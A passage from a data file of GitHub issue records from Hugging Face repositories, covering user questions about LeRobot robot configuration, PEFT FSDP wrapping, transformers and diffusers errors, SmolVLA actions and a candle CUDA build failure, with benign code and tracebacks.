In this case, the action sent differs from original action.\n Thus, this function always returns the action actually sent.\n\n Raises:\n RobotDeviceNotConnectedError: if robot is not connected.\n\n Returns:\n the action sent to the motors, potentially clipped.\n \"\"\"\n if not self.is_connected:\n raise DeviceNotConnectedError(f\"{self} is not connected.\")\n\n goal_pos = {key.removesuffix(\".pos\"): val for key, val in action.items() if key.endswith(\".pos\")}\n\n # Cap goal position when too far away from present position.\n # /!\\ Slower fps expected due to reading from the follower.\n if self.config.max_relative_target is not None:\n present_pos = self.bus.sync_read(\"Present_Position\")\n goal_present_pos = {key: (g_pos, present_pos[key]) for key, g_pos in goal_pos.items()}\n goal_pos = ensure_safe_goal_position(goal_present_pos, self.config.max_relative_target)\n\n # Send goal position to the arm\n self.bus.sync_write(\"Goal_Position\", goal_pos)\n return {f\"{motor}.pos\": val for motor, val in goal_pos.items()}\n```\nBut in `SO100FollowerConfig` it defaults to `None`:\n```python\nclass SO100FollowerConfig(RobotConfig):\n # Port to connect to the arm\n port: str\n\n disable_torque_on_disconnect: bool = True\n\n # `max_relative_target` limits the magnitude of the relative positional target vector for safety purposes.\n # Set this to a positive scalar to have the same value for all motors, or a list that is the same length as\n # the number of motors in your follower arms.\n max_relative_target: int | None = None\n\n # cameras\n cameras: dict[str, CameraConfig] = field(default_factory=dict)\n\n # sensors\n sensors: dict[str, ForceSensorConfig] = field(default_factory=dict)\n\n # Set to `True` for backward compatibility with previous policies/dataset\n use_degrees: bool = False\n```\nI don't know what value I should set `max_relative_target` to; is there any instruction? 
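(A sketch of setting it, with the import path and the value as assumptions to verify against your lerobot version. The cap is applied per motor in whatever position units the robot is configured to use, e.g. degrees when `use_degrees=True`, so one practical approach is to start conservatively small and increase until motion is responsive enough:)

```python
from lerobot.robots.so100_follower import SO100Follower, SO100FollowerConfig

config = SO100FollowerConfig(
    port="/dev/ttyACM0",    # illustrative port
    use_degrees=True,
    max_relative_target=5,  # each motor moves at most ~5 degrees per send_action
)
robot = SO100Follower(config)
```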
thanks!!", "url": "https://github.com/huggingface/lerobot/issues/1483", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-07-11T02:46:02Z", "updated_at": "2025-08-12T09:34:51Z", "user": "milong26" }, { "repo": "huggingface/peft", "number": 2640, "title": "Why does peft.utils.other.fsdp_auto_wrap_policy not wrap modules that do not require grad?", "body": "In https://github.com/huggingface/peft/blob/main/src/peft/utils/other.py#L977, \n\n```\ndef fsdp_auto_wrap_policy(model):\n if hasattr(FullyShardedDataParallelPlugin, \"get_module_class_from_name\"):\n get_module_class_from_name = FullyShardedDataParallelPlugin.get_module_class_from_name\n else:\n from accelerate.utils.dataclasses import get_module_class_from_name\n from torch.distributed.fsdp.wrap import _or_policy, lambda_auto_wrap_policy, transformer_auto_wrap_policy\n\n from ..tuners import PrefixEncoder, PromptEmbedding, PromptEncoder\n\n default_transformer_cls_names_to_wrap = \",\".join(_get_no_split_modules(model))\n transformer_cls_names_to_wrap = os.environ.get(\n \"FSDP_TRANSFORMER_CLS_TO_WRAP\", default_transformer_cls_names_to_wrap\n ).split(\",\")\n transformer_cls_to_wrap = {PrefixEncoder, PromptEncoder, PromptEmbedding}\n for layer_class in transformer_cls_names_to_wrap:\n if len(layer_class) == 0:\n continue\n transformer_cls = get_module_class_from_name(model, layer_class)\n if transformer_cls is None:\n raise Exception(\"Could not find the transformer layer class to wrap in the model.\")\n else:\n transformer_cls_to_wrap.add(transformer_cls)\n\n def lambda_policy_fn(module):\n if (\n len(list(module.named_children())) == 0\n and getattr(module, \"weight\", None) is not None\n and module.weight.requires_grad\n ):\n return True\n return False\n\n lambda_policy = functools.partial(lambda_auto_wrap_policy, lambda_fn=lambda_policy_fn)\n transformer_wrap_policy = functools.partial(\n transformer_auto_wrap_policy,\n transformer_layer_cls=transformer_cls_to_wrap,\n )\n\n auto_wrap_policy = functools.partial(_or_policy, policies=[lambda_policy, transformer_wrap_policy])\n return auto_wrap_policy\n```\n\nthe fsdp_auto_wrap_policy uses a lambda_policy_fn which does not wrap modules that do not require grad. \nBut in regular LoRA training, the original network does not need grad. \nThat may leave every GPU keeping a full copy of the network even under FSDP FULL_SHARD. 
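(A note on how the two sub-policies compose, offered as a reading of the code rather than an authoritative answer: the lambda policy is OR-ed with a `transformer_auto_wrap_policy`, and the latter matches decoder-layer classes regardless of `requires_grad`, so frozen base weights are still wrapped and therefore sharded. The lambda branch only adds wrapping for fully trainable leaf modules such as embeddings and prompt encoders, since an FSDP flat-parameter group must have uniform `requires_grad` unless `use_orig_params=True`. A toy check, with argument names assuming a recent torch:)

```python
import functools
import torch.nn as nn
from torch.distributed.fsdp.wrap import (
    _or_policy, lambda_auto_wrap_policy, transformer_auto_wrap_policy,
)

class DecoderLayer(nn.Module):  # stand-in for e.g. LlamaDecoderLayer
    def __init__(self):
        super().__init__()
        self.linear = nn.Linear(8, 8)

def lambda_policy_fn(module):
    return (
        len(list(module.named_children())) == 0
        and getattr(module, "weight", None) is not None
        and module.weight.requires_grad
    )

policy = functools.partial(
    _or_policy,
    policies=[
        functools.partial(lambda_auto_wrap_policy, lambda_fn=lambda_policy_fn),
        functools.partial(
            transformer_auto_wrap_policy, transformer_layer_cls={DecoderLayer}
        ),
    ],
)

layer = DecoderLayer()
layer.requires_grad_(False)  # frozen, as LoRA base weights are
# Matches via the transformer policy even though lambda_policy_fn is False,
# so the frozen layer is still wrapped (and thus sharded) by FSDP.
print(policy(module=layer, recurse=False, nonwrapped_numel=0))  # True
```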
\nWhy was the policy designed this way?", "url": "https://github.com/huggingface/peft/issues/2640", "state": "closed", "labels": [], "created_at": "2025-07-10T12:07:13Z", "updated_at": "2025-08-18T15:05:03Z", "comments": 4, "user": "Changlin-Lee" }, { "repo": "huggingface/transformers", "number": 39336, "title": "TypeError: GenerationMixin._extract_past_from_model_output() got an unexpected keyword argument 'standardize_cache_format'", "body": "I am using the CogVLM2 video captioning model.\n\nIt works with transformers==4.43.4 at the latest.\n\nWith transformers==4.44.0 and later I get the error below.\n\nBut I need to use the latest version of transformers, since 4-bit quantization currently fails on some GPUs and platforms.\n\nHow can I fix this issue?\n\n`TypeError: GenerationMixin._extract_past_from_model_output() got an unexpected keyword argument 'standardize_cache_format'`\n\n```\n14:23:32 - INFO - Final video tensor shape for CogVLM processing: torch.Size([3, 24, 720, 1280])\n14:23:35 - ERROR - Error during auto-captioning: GenerationMixin._extract_past_from_model_output() got an unexpected keyword argument 'standardize_cache_format'\nTraceback (most recent call last):\n File \"E:\\Ultimate_Video_Processing_v1\\STAR\\logic\\cogvlm_utils.py\", line 679, in auto_caption\n outputs_tensor = local_model_ref.generate(**inputs_on_device, **gen_kwargs)\n File \"E:\\Ultimate_Video_Processing_v1\\venv\\lib\\site-packages\\torch\\utils\\_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"E:\\Ultimate_Video_Processing_v1\\venv\\lib\\site-packages\\transformers\\generation\\utils.py\", line 2024, in generate\n result = self._sample(\n File \"E:\\Ultimate_Video_Processing_v1\\venv\\lib\\site-packages\\transformers\\generation\\utils.py\", line 3032, in _sample\n model_kwargs = self._update_model_kwargs_for_generation(\n File \"E:\\Ultimate_Video_Processing_v1\\STAR\\models\\modules\\transformers_modules\\cogvlm2-video-llama3-chat\\modeling_cogvlm.py\", line 726, in _update_model_kwargs_for_generation\n cache_name, cache = self._extract_past_from_model_output(\nTypeError: GenerationMixin._extract_past_from_model_output() got an unexpected keyword argument 'standardize_cache_format'\n```\n\n@amyeroberts, @qubvel @SunMarc @MekkCyber \n\nThe error I am getting with 4.43.1 on a B200 when doing 4-bit quantization is below. Interestingly, the same code with the same libraries works without errors on my RTX 5090 on Windows.\n\nfp16 has no issues\n\n\n```\n11:45:10 - INFO - Preparing to load model from: /workspace/STAR/models/cogvlm2-video-llama3-chat with quant: 4, dtype: torch.bfloat16, device: cuda, device_map: auto, low_cpu_mem: True\n11:45:10 - INFO - Starting model loading - this operation cannot be interrupted once started\n/workspace/venv/lib/python3.10/site-packages/torchvision/transforms/_functional_video.py:6: UserWarning: The 'torchvision.transforms._functional_video' module is deprecated since 0.12 and will be removed in the future. Please use the 'torchvision.transforms.functional' module instead.\n warnings.warn(\n/workspace/venv/lib/python3.10/site-packages/torchvision/transforms/_transforms_video.py:22: UserWarning: The 'torchvision.transforms._transforms_video' module is deprecated since 0.12 and will be removed in the future. 
Please use the 'torchvision.transforms' module instead.\n warnings.warn(\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 6/6 [01:18<00:00, 13.07s/steps]\n11:46:30 - ERROR - Failed to load CogVLM2 model from path: /workspace/STAR/models/cogvlm2-video-llama3-chat\n11:46:30 - ERROR - Exception type: ValueError\n11:46:30 - ERROR - Exception details: `.to` is not supported for `4-bit` or `8-bit` bitsandbytes models. Please use the model as it is, since the model has already been set to the correct devices and casted to the correct `dtype`.\nTraceback (most recent call last):\n File \"/workspace/STAR/logic/cogvlm_utils.py\", line 160, in load_cogvlm_model\n raise model_loading_result[\"error\"]\n File \"/workspace/STAR/logic/cogvlm_utils.py\", line 122, in load_model_thread\n model = AutoModelForCausalLM.from_pretrained(\n File \"/workspace/venv/lib/python3.10/site-packages/transformers/models/auto/auto_factory.py\", line 559, in from_pretrained\n return model_class.from_pretrained(\n File \"/workspace/venv/lib/python3.10/site-packages/transformers/modeling_utils.py\", line 4000, in from_pretrained\n dispatch_model(model, **device_map_kwargs)\n File \"/workspace/venv/lib/python3.10/site-packages/accelerate/big_modeling.py\", line 502, in dispatch_model\n model.to(device)\n File \"/workspace/venv/lib/python3.10/site-packages/transformers/modeling_utils.py\", line 2849, in to\n raise ValueError(\nValueError: `.to` is not supported for `4-bit` or `8-bit` bitsandbytes models. Please use the model as it is, since the model has already been set to the correct devices and casted to the correct `dtype`.\n11:46:30 - ERROR - Error during auto-captioning: 'Could not load CogVLM2 model (check logs for details): `.to` is not supported for `4-bit` or `8-bit` bitsandbytes models. Please use the model as it is, since the model has already been set to the correct devices and casted to the correct `dtype`.'\nTraceback (most recent call last):\n File \"/workspace/STAR/logic/cogvlm_utils.py\", line 160, in load_cogvlm_model\n raise model_loading_result[\"error\"]\n File \"/workspace/STAR/logic/cogvlm_utils.py\", line 122, in load_model_thread\n model = AutoMode", "url": "https://github.com/huggingface/transformers/issues/39336", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-10T11:49:02Z", "updated_at": "2025-08-18T08:03:13Z", "comments": 4, "user": "FurkanGozukara" }, { "repo": "huggingface/lerobot", "number": 1476, "title": "Here is an interactive gym to play with the robot (I still need some help)", "body": "### First the good news:\nThis is an interactive gym where you can experiment with pre-trained policies to control the robot in real time. 
\nHere is how to use it:\n- `Double-click` on a body to select it.\n- `Ctrl + left` drag applies a torque to the selected object, resulting in rotation.\n- `Ctrl + right` drag applies a force to the selected object in the (x,z) plane, resulting in translation.\n- `Ctrl + Shift + right` drag applies a force to the selected object in the (x,y) plane.\n\n\n### However, there are a few limitations:\n\n- When you move the cubes, the robot doesn't seem to register the new positions and instead attempts to pick them up from their original locations.\n- **Only** the environment `lerobot/act_aloha_sim_insertion_human` appears to work occasionally. The others either don't function at all or cause the program to crash due to missing attributes that haven't been implemented in the gym.\n\nI'd really appreciate feedback/guidance from the repo maintainers on how to improve this snippet to support more environments and tasks.\n\nfile `interactive_gym.py`:\n```python\nimport gymnasium as gym\nimport mujoco\nimport mujoco.viewer\nimport torch\nimport importlib\nfrom lerobot.policies.utils import get_device_from_parameters\nfrom lerobot.configs import parser\nfrom lerobot.configs.eval import EvalPipelineConfig\nfrom lerobot.policies.factory import make_policy\nfrom lerobot.envs.utils import preprocess_observation\nfrom lerobot.utils.utils import get_safe_torch_device\n\n\n# $ python interactive_gym.py --policy.path=lerobot/act_aloha_sim_insertion_human --env.type=aloha\n# $ python interactive_gym.py --policy.path=lerobot/act_aloha_sim_transfer_cube_human --env.type=aloha\n\n@parser.wrap()\ndef make_env_and_policy(cfg: EvalPipelineConfig):\n package_name = f\"gym_{cfg.env.type}\"\n\n try:\n importlib.import_module(package_name)\n except ModuleNotFoundError as e:\n print(f\"{package_name} is not installed. Please install it with `pip install 'lerobot[{cfg.env.type}]'`\")\n raise e\n\n gym_handle = f\"{package_name}/{cfg.env.task}\"\n\n env = gym.make(gym_handle, disable_env_checker=True, **cfg.env.gym_kwargs)\n\n policy = make_policy(cfg=cfg.policy, env_cfg=cfg.env)\n policy.eval() \n policy.reset()\n\n return env, policy\n\n\ndef main(env, policy):\n device = get_device_from_parameters(policy)\n\n viewer = mujoco.viewer.launch_passive(env.unwrapped.model, env.unwrapped.data)\n\n observation, info = env.reset(seed=42)\n viewer.sync()\n\n for i in range(40000):\n observation = preprocess_observation(observation)\n observation = {\n key: observation[key].to(device, non_blocking=device.type == \"cuda\") for key in observation\n }\n\n # Infer \"task\" from attributes of environments.\n # TODO: works with SyncVectorEnv but not AsyncVectorEnv\n if hasattr(env, \"task_description\"):\n observation[\"task\"] = env.unwrapped.task_description\n elif hasattr(env, \"task\"):\n observation[\"task\"] = env.unwrapped.task\n else: # For envs without language instructions, e.g. 
aloha transfer cube.\n observation[\"task\"] = \"\"\n\n with torch.inference_mode():\n action = policy.select_action(observation)\n\n # Convert to CPU / numpy.\n action = action.to(\"cpu\").numpy()\n assert action.ndim == 2, \"Action dimensions should be (batch, action_dim)\"\n\n # Apply the next action.\n #observation, reward, terminated, truncated, info = env.step(action)\n\n observation, reward, terminated, truncated, info = env.step(action[0])\n viewer.sync()\n \n if terminated or truncated:\n observation, info = env.reset()\n viewer.sync()\n \n if i % 100 == 0:\n print(i)\n\n viewer.close()\n env.close()\n\ntorch.backends.cudnn.benchmark = True\ntorch.backends.cuda.matmul.allow_tf32 = True\n\nenv, policy = make_env_and_policy()\nmain(env, policy)\n```\n\n", "url": "https://github.com/huggingface/lerobot/issues/1476", "state": "open", "labels": [ "question", "simulation" ], "created_at": "2025-07-09T14:59:22Z", "updated_at": "2025-12-16T13:41:00Z", "user": "raul-machine-learning" }, { "repo": "huggingface/lerobot", "number": 1475, "title": "[Question] What does each number in the predicted action (SmolVLA) stand for?", "body": "Hi, I'm trying to load SmolVLA and test it in my simulation env. \n\nAfter passing the observations to the model using \"policy.select_action(obs)\", I got a 6-dimensional action, but I'm quite confused about what exactly the values are. And if three are for position translation and three for rotation, how could I control opening and closing the gripper?\n\nThanks.", "url": "https://github.com/huggingface/lerobot/issues/1475", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-09T13:39:25Z", "updated_at": "2025-08-12T10:08:26Z", "user": "Calvert0921" }, { "repo": "huggingface/lerobot", "number": 1471, "title": "where is 7_get_started_with_real_robot.md?", "body": "I didn't find 7_get_started_with_real_robot.md", "url": "https://github.com/huggingface/lerobot/issues/1471", "state": "closed", "labels": [ "documentation", "question" ], "created_at": "2025-07-09T08:02:32Z", "updated_at": "2025-10-08T08:42:21Z", "user": "von63" }, { "repo": "huggingface/alignment-handbook", "number": 218, "title": "Will you release the SmolLM 3 recipe?", "body": "First off, thank you so much for sharing these training resources.\n\nI was wondering if, with the recent release of SmolLM3, you have plans to also share its training recipe.\n\nHave a nice day!", "url": "https://github.com/huggingface/alignment-handbook/issues/218", "state": "closed", "labels": [], "created_at": "2025-07-08T19:47:20Z", "updated_at": "2025-07-15T14:16:11Z", "comments": 1, "user": "ouhenio" }, { "repo": "huggingface/sentence-transformers", "number": 3433, "title": "How to use a custom batch sampler?", "body": "`SentenceTransformerTrainer.__init__` will check the type of the args, so I have to write a class inheriting from `SentenceTransformerTrainingArgs` rather than `TransformerTrainingArgs`. The problem is that `SentenceTransformerTrainingArgs.__post_init__` forces the use of `BatchSampler` to initialize a batch sampler. Is there any workaround for this? 
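The workaround I'm experimenting with is subclassing the trainer rather than the args. If I read the source correctly, recent sentence-transformers versions route batch-sampler creation through a `get_batch_sampler` method on the trainer (a sketch; please check the method name and signature against your installed version):

```python
from torch.utils.data import BatchSampler, SequentialSampler
from sentence_transformers import SentenceTransformerTrainer

class MyTrainer(SentenceTransformerTrainer):
    def get_batch_sampler(self, dataset, batch_size, drop_last, valid_label_columns=None, generator=None):
        # Bypass the batch-sampler choice from the training args and return any
        # torch-style batch sampler; plain sequential batching shown here.
        return BatchSampler(SequentialSampler(dataset), batch_size=batch_size, drop_last=drop_last)
```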
", "url": "https://github.com/huggingface/sentence-transformers/issues/3433", "state": "open", "labels": [], "created_at": "2025-07-08T09:35:24Z", "updated_at": "2025-07-08T12:36:33Z", "user": "Hypothesis-Z" }, { "repo": "huggingface/transformers", "number": 39266, "title": "Unable to create tensor, you should probably activate truncation and/or padding with 'padding=True' 'truncation=True' to have batched tensors with the same length.", "body": "### System Info\n\n```bash\nTraceback (most recent call last):\n File \"/home/cx/miniconda3/envs/demo/lib/python3.10/site-packages/transformers/tokenization_utils_base.py\", line 767, in convert_to_tensors\n tensor = as_tensor(value)\n File \"/home/cx/miniconda3/envs/demo/lib/python3.10/site-packages/transformers/tokenization_utils_base.py\", line 729, in as_tensor\n return torch.tensor(value)\nValueError: expected sequence of length 15757 at dim 1 (got 16242)\n```\n*DataCollatorForLanguageModeling* seems to only padding input ids and ignore labels, resulting in different lengths of labels in a batch. Why is this?\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\ndef _process_fn(samples, tokenizer : PreTrainedTokenizerFast, config):\n samples = [[{\"role\" : \"user\", \"content\" : x[0]}, {\"role\" : \"assistant\", \"content\" : x[1]}]\n for x in zip(samples[\"input\"], samples[\"output\"])]\n # tokenized_data = tokenizer.apply_chat_template(samples, \n # return_tensors=\"pt\",\n # return_dict=True,\n # padding=\"max_length\",\n # truncation=True,\n # max_length=8000)\n tokenized_data = tokenizer.apply_chat_template(samples, \n return_tensors=\"pt\",\n return_dict=True,\n padding=True\n )\n samples_ids = tokenized_data[\"input_ids\"]\n attention_mask = tokenized_data[\"attention_mask\"]\n output_ids = []\n for i, seq in enumerate(samples_ids):\n output_index = torch.where(seq == SPECIAL_GENERATE_TOKEN_ID)[0]\n mask = attention_mask[i]\n if len(output_index) == 1:\n output_index = output_index[0].item()\n else:\n continue\n temp = torch.full_like(seq, -100)\n temp[output_index:] = seq[output_index:]\n temp[mask == 0] = -100\n output_ids.append(temp)\n\n labels = torch.stack(output_ids)\n return {\"input_ids\" : samples_ids,\n \"labels\" : labels,\n \"attention_mask\" : attention_mask}\n\ntrainer = Trainer(\n model=peft_model,\n args=train_config,\n train_dataset=train_data,\n eval_dataset=eval_data,\n data_collator=DataCollatorForLanguageModeling(\n tokenizer=tokenizer,\n mlm=False,\n pad_to_multiple_of=8 if torch.cuda.is_available() else None,\n return_tensors=\"pt\"\n )\n )\n```\n\n\n### Expected behavior\n\nrun code", "url": "https://github.com/huggingface/transformers/issues/39266", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-08T05:19:35Z", "updated_at": "2025-07-08T06:50:47Z", "comments": 0, "user": "mumu029" }, { "repo": "huggingface/lerobot", "number": 1460, "title": "How to support dataloading with historical cue?", "body": "as i see, the getitem function of LerobotDataset now returns the single frame data, how to stack the historical frames and make use of batch data with historical information like univla?\n", "url": "https://github.com/huggingface/lerobot/issues/1460", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-07-08T01:49:11Z", 
"updated_at": "2025-08-12T09:44:02Z", "user": "joeyxin-del" }, { "repo": "huggingface/lerobot", "number": 1458, "title": "how to control a real robot arm-101 with my own pretrained model?", "body": "I don't see the instruction or script example on this repository\u3002\nPlease help\n\nThanks,\n", "url": "https://github.com/huggingface/lerobot/issues/1458", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-08T01:19:50Z", "updated_at": "2025-08-12T09:45:13Z", "user": "jcl2023" }, { "repo": "huggingface/candle", "number": 3016, "title": "Build fails on Maxwell GPU due to __dp4a undefined in quantized.cu", "body": "I\u2019m trying to build a Rust project locally that depends on candle-kernels on my laptop with an NVIDIA GeForce 940MX (Maxwell, compute capability 5.0). The build fails with errors like:\n\n```\n\nsrc/quantized.cu(1997): error: identifier \"__dp4a\" is undefined\n...\n18 errors detected in the compilation of \"src/quantized.cu\".\n\n```\n\nGPU: NVIDIA GeForce 940MX (GM107, compute capability 5.0)\nOS: Kali Linux (rolling)\nCUDA toolkit: 12.3\nNVIDIA driver: 550.163.01\ncandle-kernels: v0.7.2\n\n\nThe error is caused by the use of the CUDA intrinsic __dp4a, which is only available on GPUs with compute capability 6.1+ (Pascal and newer).\nMy GPU is compute 5.0, so this intrinsic is not available.\n\n**Questions:**\nIs there a way to disable quantized kernels or the use of __dp4a for older GPUs?\nIf not, could a feature flag or build option be added to support older hardware, or at least skip building quantized kernels on unsupported GPUs?\n", "url": "https://github.com/huggingface/candle/issues/3016", "state": "open", "labels": [], "created_at": "2025-07-07T14:41:53Z", "updated_at": "2025-07-07T14:41:53Z", "comments": 0, "user": "fishonamos" }, { "repo": "huggingface/text-generation-inference", "number": 3289, "title": "How to detect watermark?", "body": "Hi,\n\nThanks for the great work.\n\nI saw in the current code the KGW watermark is implemented. But it seems lack of code to evaluate and detect whether the generated text contains watermark.\n\nCould anyone suggest whether this code is exists? It will be very helpful.\n\nThanks", "url": "https://github.com/huggingface/text-generation-inference/issues/3289", "state": "open", "labels": [], "created_at": "2025-07-07T11:42:54Z", "updated_at": "2025-07-07T11:42:54Z", "user": "Allencheng97" }, { "repo": "huggingface/lerobot", "number": 1448, "title": "How to specify both policy.type and pretrained path at the same time?", "body": "Hi, I am adding custom configs to a PreTrainedConfig, and I also want to load it from a pretrained path. However, if I specify the pretrained path (with policy.path), I won't be able to modify the fields inside the new PreTrainedConfig subclass. If I use policy.type=\"myNewModel\" instead, I am able to call the fields (such as `policy.new_field_in_myNewModel` when I run `lerobot/scripts/train.py`, but unable to specify the pretrained path.\n\nWhat is a good solution to this problem? \n\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/1448", "state": "open", "labels": [ "enhancement", "configuration" ], "created_at": "2025-07-07T03:33:15Z", "updated_at": "2025-08-12T09:45:58Z", "user": "branyang02" }, { "repo": "huggingface/lerobot", "number": 1447, "title": "SmolVLA input/output clarification", "body": "I'm now trying to load the SmolVLA to control the Franka arm in simulation. 
I found that there could be three image inputs (observation.image, 1 and 2), and I have top, wrist and side views. Is there a fixed order for those camera views?\n\nAlso, the predicted action has 6 dimensions; does that mean it doesn't include the gripper state? What do those values represent? Thanks in advance!", "url": "https://github.com/huggingface/lerobot/issues/1447", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-06T21:56:43Z", "updated_at": "2025-10-09T21:59:17Z", "user": "Calvert0921" }, { "repo": "huggingface/lerobot", "number": 1446, "title": "How to evaluate a finetuned SmolVLA model", "body": "Dear authors, thank you for your wonderful work.\nI have fine-tuned the SmolVLA model on a customized LeRobot-format dataset. The task in my dataset is picking up a banana and placing it on a box. How can I evaluate the performance of the model? I tried eval.py in the scripts directory, but env_type=pusht doesn't work. I think this env_type may be causing eval.py to fail.\nI hope someone can help me. Thanks in advance.\n", "url": "https://github.com/huggingface/lerobot/issues/1446", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-06T15:27:22Z", "updated_at": "2025-10-17T11:57:49Z", "user": "BintaoBryant" }, { "repo": "huggingface/diffusers", "number": 11865, "title": "AttributeError: type object 'CosmosTransformer3DModel' has no attribute 'from_single_file'", "body": "### Describe the bug\n\nI would like to run the Cosmos-Predict2-14B-Text2Image model, but it is too large to fit in 24GB of VRAM normally, so I tried to load a Q8_0 GGUF quantization. I copied some code from the [HiDreamImageTransformer2DModel](https://huggingface.co/docs/diffusers/en/api/models/hidream_image_transformer#loading-gguf-quantized-checkpoints-for-hidream-i1) page and tried to adapt it, but I get the following error:\n\n`AttributeError: type object 'CosmosTransformer3DModel' has no attribute 'from_single_file'`\n\nIs there supposed to be another way to load an 8-bit quantization? 
From what I have seen, Q8_0 typically produces results that are much closer to full precision compared to FP8.\n\n### Reproduction\n\n```\ntransformer = CosmosTransformer3DModel.from_single_file(\n rf\"{model_14b_id}\\cosmos-predict2-14b-text2image-Q8_0.gguf\",\n quantization_config=GGUFQuantizationConfig(compute_dtype=torch.bfloat16),\n torch_dtype=torch.bfloat16\n)\npipe_14b = Cosmos2TextToImagePipeline.from_pretrained(\n model_14b_id,\n torch_dtype=torch.bfloat16,\n transformer = transformer\n)\n```\n\n### Logs\n\n```shell\n transformer = CosmosTransformer3DModel.from_single_file(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nAttributeError: type object 'CosmosTransformer3DModel' has no attribute 'from_single_file'\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.35.0.dev0\n- Platform: Windows-10-10.0.26100-SP0\n- Running on Google Colab?: No\n- Python version: 3.11.9\n- PyTorch version (GPU?): 2.7.1+cu128 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.33.1\n- Transformers version: 4.53.0\n- Accelerate version: 1.8.1\n- PEFT version: 0.15.2\n- Bitsandbytes version: 0.46.1\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA GeForce RTX 4090, 24564 MiB\n- Using GPU in script?: Yes\n- Using distributed or parallel set-up in script?: No\n\n\n### Who can help?\n\n@DN6 ", "url": "https://github.com/huggingface/diffusers/issues/11865", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-05T12:14:50Z", "updated_at": "2025-07-11T07:15:23Z", "comments": 9, "user": "mingyi456" }, { "repo": "huggingface/diffusers", "number": 11864, "title": "AutoencoderDC.encode fails with torch.compile(fullgraph=True) - \"name 'torch' is not defined\"", "body": "### Describe the bug\n\nI'm trying to optimize my data preprocessing pipeline for the Sana model by using `torch.compile` on the DC-AE encoder. Following PyTorch's best practices, I attempted to compile only the `encode` method with `fullgraph=True` for better performance, but I'm encountering an error.\n\nWhen I try:\n```python\ndae.encode = torch.compile(dae.encode, fullgraph=True)\n```\n\nThe code fails with `NameError: name 'torch' is not defined` when calling `dae.encode(x)`.\n\nHowever, compiling the entire model works:\n```python\ndae = torch.compile(dae, fullgraph=True)\n```\n\nI'm unsure if this is expected behavior or if I'm doing something wrong. Is there a recommended way to compile just the encode method for `AutoencoderDC`? \n\nI was advised to use the more targeted approach of compiling only the encode method for better performance, but it seems like the DC-AE model might have some internal structure that prevents this optimization pattern.\n\nAny guidance on the correct way to apply `torch.compile` optimizations to `AutoencoderDC` would be greatly appreciated. 
Should I stick with compiling the entire model, or is there a way to make method-level compilation work?\n\n\n### Reproduction\n\n```python\nimport torch\nfrom diffusers import AutoencoderDC\n\n# Load model\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndae = AutoencoderDC.from_pretrained(\n \"mit-han-lab/dc-ae-f32c32-sana-1.1-diffusers\",\n torch_dtype=torch.bfloat16\n).to(device).eval()\n\n# This fails with \"name 'torch' is not defined\"\ndae.encode = torch.compile(dae.encode, fullgraph=True)\n\n# Test\nx = torch.randn(1, 3, 512, 512, device=device, dtype=torch.bfloat16)\nout = dae.encode(x) # Error occurs here\n# This works fine\ndae = torch.compile(dae, fullgraph=True)\n```\n\n### Logs\n\n```shell\nTesting torch.compile(dae.encode, fullgraph=True)\n/data1/tzz/anaconda_dir/envs/Sana/lib/python3.10/site-packages/torch/_inductor/compile_fx.py:150: UserWarning: TensorFloat32 tensor cores for float32 matrix multiplication available but not enabled. Consider setting `torch.set_float32_matmul_precision('high')` for better performance.\n warnings.warn(\n \u2717 Error: name 'torch' is not defined\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.34.0.dev0\n- Platform: Linux-5.15.0-142-generic-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.10.18\n- PyTorch version (GPU?): 2.4.0+cu121 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.33.0\n- Transformers version: 4.45.2\n- Accelerate version: 1.7.0\n- PEFT version: 0.15.2\n- Bitsandbytes version: 0.46.0\n- Safetensors version: 0.5.3\n- xFormers version: 0.0.27.post2\n- Accelerator: NVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\n- Using GPU in script?: yes\n- Using distributed or parallel set-up in script?: no\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/11864", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-05T06:15:11Z", "updated_at": "2025-07-09T01:32:39Z", "comments": 6, "user": "SingleBicycle" }, { "repo": "huggingface/datasets", 